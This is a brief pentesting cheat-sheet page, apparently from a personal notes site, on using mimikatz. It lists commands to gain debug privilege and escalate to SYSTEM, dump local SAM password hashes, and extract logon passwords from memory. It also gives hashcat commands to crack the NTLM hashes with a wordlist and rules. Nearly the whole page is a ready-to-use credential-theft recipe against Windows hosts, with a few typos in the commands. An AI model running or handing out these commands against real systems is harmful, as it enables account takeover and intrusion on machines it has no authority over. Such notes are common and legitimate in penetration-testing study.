mimikatz

debug privilege and escelate to system
- privilege::debug
- token::elevate
dump sam local password hashes
- lsadump::sam
- can be craked using hashcat
  - put files into a file (filename.hash)
  - hashcat --help | grep -i "ntml"
  - hashcat -m 1000 file.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
  - hashcat --show -m 1000 file.has
get logon passwords
- sekurlsa::logonpasswords

Previousevil-winrm Nextwinpeas

Last updated 1 month ago